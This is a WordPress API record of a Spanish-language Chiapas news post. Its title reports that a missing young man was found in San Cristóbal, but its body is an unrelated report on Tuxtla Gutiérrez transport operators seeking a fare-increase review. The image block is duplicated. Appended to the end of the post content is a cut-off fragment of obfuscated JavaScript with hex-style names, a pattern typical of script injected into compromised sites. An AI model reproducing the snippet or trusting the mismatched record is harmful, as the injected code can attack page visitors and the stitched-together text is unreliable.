{"id":9882,"date":"2023-05-04T03:58:37","date_gmt":"2023-05-04T03:58:37","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=9882"},"modified":"2023-05-04T04:40:35","modified_gmt":"2023-05-04T04:40:35","slug":"localizan-a-joven-desaparecido-en-san-cristobal","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=9882","title":{"rendered":"Localizan a joven desaparecido en San Crist\u00f3bal"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"712\" height=\"431\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/FB_IMG_1683173085333.jpg\" alt=\"\" class=\"wp-image-9886\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/FB_IMG_1683173085333.jpg 712w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/FB_IMG_1683173085333-300x182.jpg 300w\" sizes=\"auto, (max-width: 712px) 100vw, 712px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"712\" height=\"431\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/FB_IMG_1683173085333.jpg\" alt=\"\" class=\"wp-image-9886\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/FB_IMG_1683173085333.jpg 712w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/FB_IMG_1683173085333-300x182.jpg 300w\" sizes=\"auto, (max-width: 712px) 100vw, 712px\" \/><\/figure>\n\n\n\n<p>Piden realizar an\u00e1lisis para incremento en la tarifa de transporte en Tuxtla<\/p>\n\n\n\n<p>Rodolfo Flores.<\/p>\n\n\n\n<p>3 de mayo del 2023. Tuxtla Guti\u00e9rrez.- Transportistas de la capital chiapaneca informan que la movilidad de pasaje en Tuxtla Guti\u00e9rrez, no se ha normalizado al cien por ciento, lo que causa una afectaci\u00f3n econ\u00f3mica importante a los concesionarios.<\/p>\n\n\n\n<p>Jorge Omar V\u00e1zquez Mart\u00ednez, representante de la Coordinaci\u00f3n Estatal de Transportistas de Chiapas (COESTRACH), manifest\u00f3 que, desde el confinamiento forzado por la pandemia COVID-19, la disminuci\u00f3n de pasaje ha sido notoria.<\/p>\n\n\n\n<p>Dijo que en el caso de la Ruta 108, han sido casi tres a\u00f1os que han tenido que soportar este panorama, incluso existen casos en los que, los concesionarios han tenido que devolver unidades a las agencias por no poder pagarlas.<\/p>\n\n\n\n<p>Agreg\u00f3 que se desconocen los motivos por los que, no se logra igualar los n\u00fameros de pasajeros, pero considera que est\u00e1n en un 70-80 por ciento.<\/p>\n\n\n\n<p>&#8220;La verdad es que, no sabemos qu\u00e9 ocurre, pero tambi\u00e9n las tarifas de ingreso a los due\u00f1os y choferes no se normaliza, aqu\u00ed el problema es que, el mantenimiento de las unidades se ha elevado mucho, as\u00ed como el combustible&#8221;, expres\u00f3.<\/p>\n\n\n\n<p>Los concesionarios han realizado en diferentes ocasiones la petici\u00f3n sobre un incremento a la tarifa de transporte en la modalidad de colectivo, la cual debe realizarse lo antes posible.<\/p>\n\n\n\n<p>Puntualiz\u00f3 que, si bien es cierto que, el aumento de la tarifa no lo decide el concesionario es necesario someter a un an\u00e1lisis este tema por el panorama en que se encuentra este gremio actualmente, el cual no se recupera despu\u00e9s de la pandemia.<\/p>\n\n\n\n<p>Por parte de los transportistas, asegur\u00f3, no hay un estimado en cu\u00e1nto debe ser el incremento de la tarifa en estos momentos.<\/p>\n\n\n\n<p>&#8220;Las autoridades de transporte se han mantenido ap\u00e1ticos con este tema, lo que ser\u00eda fundamental para mejorar el servicio en las rutas de la ciudad&#8221;, expres\u00f3.<\/p>\n\n\n\n<p>Este es un tema controversial, por ello, insisti\u00f3 en la participaci\u00f3n de las autoridades y transportistas, para evitar afectaciones a los usuarios y propietarios de unidades que dependen de este sector.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Piden realizar an\u00e1lisis para incremento en la tarifa de transporte en Tuxtla Rodolfo Flores. 3 de mayo del 2023. Tuxtla Guti\u00e9rrez.- Transportistas de la capital chiapaneca informan que la movilidad de pasaje en Tuxtla Guti\u00e9rrez, no se ha normalizado al cien por ciento, lo que causa una afectaci\u00f3n econ\u00f3mica importante a los concesionarios. Jorge Omar &hellip;<\/p>\n","protected":false},"author":2,"featured_media":9883,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-9882","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9882","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9882"}],"version-history":[{"count":2,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9882\/revisions"}],"predecessor-version":[{"id":9887,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9882\/revisions\/9887"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/9883"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9882"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9882"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9882"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}